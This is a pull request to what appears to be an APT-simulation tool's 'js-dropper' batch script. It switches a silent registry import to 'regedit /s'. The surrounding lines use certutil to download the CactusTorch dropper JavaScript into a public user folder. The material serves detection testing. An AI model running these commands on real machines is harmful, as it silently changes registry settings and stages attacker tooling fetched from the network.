### PR TITLE
Fix registry key import command

### DIFF
--- a/test-sets/defense-evasion/js-dropper.bat
+++ b/test-sets/defense-evasion/js-dropper.bat
@@ -7,7 +7,7 @@ ping -n 5 127.0.0.1 > NUL
 
 ECHO Fixing possible problems with JavaScript on the system
 "%ZIP%" e -p%PASS% "%FILEARCH%" -aoa -o"%TEMP%" workfiles\jsfix.reg > NUL
-reg import /s "%TEMP%\jsfix.reg"
+regedit /s "%TEMP%\jsfix.reg"
 
 ECHO Downloading the CactusTorch dropper (press Enter if it takes more than 20s)
 cmd.exe /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/NextronSystems/APTSimulator/master/download/cactus.js C:\Users\Public\en-US.js


### PR DESCRIPTION
During _js-dropper.bat_ execution, _jsfix.reg_ should be imported into registry from _%TEMP%_ folder. The command used is not correct according to Microsoft documentation: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import
Instead use _regedit_ command with _/s_ flag to achieve the same result.